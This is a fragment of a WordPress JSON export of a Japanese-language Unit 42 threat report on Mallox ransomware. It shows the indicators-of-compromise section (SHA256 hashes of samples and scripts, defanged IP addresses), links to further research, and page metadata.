style=\"font-family: 'courier new', courier, monospace;\">586d4f86615cb3a8709ae1c08dde35087580814c1d1315af3d7b932639ff48e0<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">8e974a3be94b7748f7971f278160a74d738d5cab2c3088b1492cfbbd05e83e22<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">3fa36079fdc548db1b5122450c2e4c9e40c37059de116d1c03f6459b13fc2dc4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">D15f12a7cf2e8ec3d6fceabfab64956c7e727caab91cff9c664f92b5c8552570<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">0427a9f68d2385f7d5ba9e9c8e5c7f1b6e829868ef0a8bc89b2f6dae2f2020c4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">4cbac922af3cfaba5fa7a3251bd05337bffd9ed0ada77c55bb4f78a041f4ebf2<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">10f96f64659415e46c3f2f823bdb855aab42d0bfced811c9a3b72aea5f22d880<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">5ccff9af23c18998221f45396732539d18e330454327d1e7450095c682d8c552<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">77fdce66e7f909300e4493cbe7055254f7992ba65f9b7445a6755d0dbd9f80a5<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ee08e3366c04574f25909494ef276e65e98d54f226c0f8e51922247ca3cfade9<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">2fd3c8fab2cfaaabf53d6c50e515dd5d1ef6eceeebdd5509c23030c4d54cb014<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">603846d113ef1f588d9a3a695917191791fbad441f742bcfe797813f9fc5291e<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">9b833d5b4bdbc516e4773c489ced531b13028094ce610e96ebc30d3335458a97<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">b9e895830878124e20293f477549329d4d8752ff118f4fe893d81b3a30852c0b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">cd80506f971b95b3b831cef91bb2ec422b1a27301f26d5deac8e19f163f0839a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">c0e35b19f97021416e3724006511afc95d6aa409404e812d8c62b955bc917d3c<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">342930d44aed72f826a3f0f4a3964158f2bd86fb53703fb3daa6c937b28a53e4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">9ee35c6eb97230cd9b61ba32dba7befea4122f89b3747d2389970050a1d019f9<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">e7e00e0f817fcb305f82aec2e60045fcdb1b334b2621c09133b6b81284002009<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">e3f63ab8ef91e0c52384c0e3e350db2427c8cb9237355800a3443b341cf8cf4f<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">f7e8a0eac54dd040e2609546fca263f2c2753802ff57e7c62d5e9ccfa04bdb1a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">e7178a4bad4407316b85894307df32fdf85b597455364eb8ec4d407749e852ce<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-129319-_wb8mmgwpf0k7\"><\/a>PowerShell \u30b9\u30af\u30ea\u30d7\u30c8 Updt.ps1 \u304a\u3088\u3073 Upddt.ps1 \u306e SHA256 \u30cf\u30c3\u30b7\u30e5<\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">dcc9e23fd6ac926eb9ee7e0ee422dacd2059b4a42c8642d32bdf4f5c8eb33f6a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">fead3d518752ddb4d2407f16ca5f3c9b3c0bf01972a2618369d02913f7c6af1a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">0901a9920c9f0c74fb2170524477693d62c8493715520ae95143abd8055e7a39<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ba97fd533e8a552664695434227b24ca1e2e661c360a7a0a40ff59ba6b8fe949<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">53da732df7599f5ad21a26b669500788a827f3a8358dcdca10997d2b8187c95c<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">189c9c4603defb14fa8c942f5ff7814804654269917640478686530f91c4b66c<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">fd0030883b9e74b383ee6381a2aaa7e2e5b93a00003b555e2f7c8b7be65ab176<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d22b3218c4b7f13fe114854d1dbda02c3ad94a1b6c69daa1cf6a504ada8b8bca<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">b6447b0636085fcb41fd574e84500958f21dfe87fe06b0813fb9399d63f28851<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">5c34f6fa6eada3197404bf95eced9d288688537598629158a4f4e18d6882cb9b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d81b0425d4ec49bad194b8dc750524c2a29994fe972e733376349f47961cfa62<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-129319-_c5uysp406e13\"><\/a>System.bat<\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1e2515efb64200258752d785863fd35df6039441a80cb615dfff4fbdffb484ec<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">777a5782426e5b42e0e5e8445dd9602d123e8acc27aca4daa8e9c053f3d5b899<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">9e3684be0b4c2dc93f962c03275e050fed57d9be6411396f51bdf8d4bb5e21c0<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">cb47327c7cce30cff8962c48fa3b51e57e331e1592ea78b21589164c5396ccd9<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-129319-_3vyfzc3iwzu2\"><\/a>Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u306b\u95a2\u9023\u3059\u308b IP \u30a2\u30c9\u30ec\u30b9<\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">103.96.72[.]140<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80.66.75[.]36<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80.66.75[.]37<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80.66.75[.]126<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80.66.75[.]116<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">92.118.148[.]227<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">62.122.184[.]113<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">87.251.64[.]245<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">119.3.125[.]197<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">49.235.255[.]219<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80.66.75[.]55<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">87.251.67[.]92<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">121.4.69[.]26<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">124.223.11[.]169<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">45.93.201[.]74<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80.66.75[.]135<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">194.26.135[.]44<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">80.66.75[.]51<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">89.117.55[.]149<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">5.181.86[.]241<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">185.170.144[.]153<\/span><\/li>\n<\/ul>\n<h2><a id=\"post-129319-_eoura034lmtc\"><\/a>\u8ffd\u52a0\u30ea\u30bd\u30fc\u30b9<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/security\/news\/ransomware-spotlight\/ransomware-spotlight-targetcompany\" target=\"_blank\" rel=\"noopener\">Ransomware Spotlight: TargetCompany<\/a> \u2013 Trend Micro<\/li>\n<li><a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/xollam-the-latest-face-of-targetcompany.html\" target=\"_blank\" rel=\"noopener\">Xollam, the Latest Face of TargetCompany<\/a> \u2013 Trend Micro<\/li>\n<li><a href=\"https:\/\/labs.k7computing.com\/index.php\/mallox-ransomware\/\" target=\"_blank\" rel=\"noopener\">Mallox Ransomware<\/a> \u2013 K7 Security Labs, Blog<\/li>\n<li><a href=\"https:\/\/asec.ahnlab.com\/en\/39152\/\" target=\"_blank\" rel=\"noopener\">FARGO Ransomware (Mallox) Being Distributed to Unsecured MS-SQL Servers<\/a> \u2013 ASEC Blog, AhnLab<\/li>\n<li><a href=\"https:\/\/www.suspectfile.com\/interview-with-mallox-ransomware-group\/\" target=\"_blank\" rel=\"noopener\">Interview With Mallox Ransomware Group<\/a> \u2013 SuspectFile<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 Mallox (\u5225\u540d TargetCompany\u3001FARGO\u3001Tohnichi) \u306f\u3001Microsoft Windows \u30b7\u30b9\u30c6\u30e0\u3092\u6a19\u7684\u3068\u3059\u308b\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30d5\u30a1\u30df\u30ea\u30fc\u3067\u3059\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f 2021 \u5e74 6 \u6708\u304b<\/p>\n","protected":false},"author":323,"featured_media":134366,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[3057,4432,4428],"tags":[5033,5043,5035,5037,5039,5041],"product_categories":[4441,4443,4444,4446,4448,4450,4465],"coauthors":[3808,3123],"class_list":["post-129319","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ransomware-ja","category-top-cyberthreats-ja","category-threat-research-ja","tag-double-extortion-ja","tag-gurgling-scorpius-ja","tag-mallox-ransomware-ja","tag-owassrf-ja","tag-proxylogon-ja","tag-proxyshell-ja","product_categories-advanced-dns-security-ja","product_categories-advanced-url-filtering-ja","product_categories-advanced-wildfire-ja","product_categories-cloud-delivered-security-services-ja","product_categories-cortex-xdr-ja","product_categories-cortex-xsiam-ja","product_categories-unit-42-incident-response-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2<\/title>\n<meta name=\"description\" content=\"2023 \u5e74\u306f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u6d3b\u52d5\u304c\u6d3b\u767a\u5316\u3057\u3066\u3044\u307e\u3059\u3002\u5f7c\u3089\u306e\u653b\u6483\u6280\u8853\u3084\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u52df\u96c6\u6d3b\u52d5\u306a\u3069\u3001\u8105\u5a01\u6982\u8981\u3068\u6700\u8fd1\u78ba\u8a8d\u3055\u308c\u305f\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\" \/>\n<meta property=\"og:description\" content=\"2023 \u5e74\u306f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u6d3b\u52d5\u304c\u6d3b\u767a\u5316\u3057\u3066\u3044\u307e\u3059\u3002\u5f7c\u3089\u306e\u653b\u6483\u6280\u8853\u3084\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u52df\u96c6\u6d3b\u52d5\u306a\u3069\u3001\u8105\u5a01\u6982\u8981\u3068\u6700\u8fd1\u78ba\u8a8d\u3055\u308c\u305f\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-21T02:16:47+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-31T01:03:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/05_Ransomware_Category_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Lior Rochberger, Shimi Cohen\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2","description":"2023 \u5e74\u306f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u6d3b\u52d5\u304c\u6d3b\u767a\u5316\u3057\u3066\u3044\u307e\u3059\u3002\u5f7c\u3089\u306e\u653b\u6483\u6280\u8853\u3084\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u52df\u96c6\u6d3b\u52d5\u306a\u3069\u3001\u8105\u5a01\u6982\u8981\u3068\u6700\u8fd1\u78ba\u8a8d\u3055\u308c\u305f\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/","og_locale":"ja_JP","og_type":"article","og_title":"\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2","og_description":"2023 \u5e74\u306f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u6d3b\u52d5\u304c\u6d3b\u767a\u5316\u3057\u3066\u3044\u307e\u3059\u3002\u5f7c\u3089\u306e\u653b\u6483\u6280\u8853\u3084\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u52df\u96c6\u6d3b\u52d5\u306a\u3069\u3001\u8105\u5a01\u6982\u8981\u3068\u6700\u8fd1\u78ba\u8a8d\u3055\u308c\u305f\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/","og_site_name":"Unit 42","article_published_time":"2023-07-21T02:16:47+00:00","article_modified_time":"2024-07-31T01:03:52+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/05_Ransomware_Category_1920x900.jpg","type":"image\/jpeg"}],"author":"Lior Rochberger, Shimi Cohen","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/"},"author":{"name":"Ayako Kimijima","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/5502567dd627cdd5a306432cd651a90e"},"headline":"\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2","datePublished":"2023-07-21T02:16:47+00:00","dateModified":"2024-07-31T01:03:52+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/"},"wordCount":1748,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/05_Ransomware_Category_1920x900.jpg","keywords":["double extortion","Gurgling Scorpius","Mallox ransomware","OWASSRF","ProxyLogon","ProxyShell"],"articleSection":["\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2","\u4e3b\u306a\u30b5\u30a4\u30d0\u30fc\u8105\u5a01","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/","name":"\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/05_Ransomware_Category_1920x900.jpg","datePublished":"2023-07-21T02:16:47+00:00","dateModified":"2024-07-31T01:03:52+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/5502567dd627cdd5a306432cd651a90e"},"description":"2023 \u5e74\u306f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u6d3b\u52d5\u304c\u6d3b\u767a\u5316\u3057\u3066\u3044\u307e\u3059\u3002\u5f7c\u3089\u306e\u653b\u6483\u6280\u8853\u3084\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u52df\u96c6\u6d3b\u52d5\u306a\u3069\u3001\u8105\u5a01\u6982\u8981\u3068\u6700\u8fd1\u78ba\u8a8d\u3055\u308c\u305f\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u89e3\u8aac\u3057\u307e\u3059\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/05_Ransomware_Category_1920x900.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/05_Ransomware_Category_1920x900.jpg","width":1920,"height":900,"caption":"A digital graphic of a U.S. dollar bill disintegrating into pixels, symbolizing digital transformation or the concept of cryptocurrency against a backdrop of a dark, tech-inspired visual theme."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/5502567dd627cdd5a306432cd651a90e","name":"Ayako Kimijima","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Ayako Kimijima"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/akimijima\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/129319","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/323"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=129319"}],"version-history":[{"count":7,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/129319\/revisions"}],"predecessor-version":[{"id":135966,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/129319\/revisions\/135966"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/134366"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=129319"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=129319"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=129319"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=129319"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=129319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}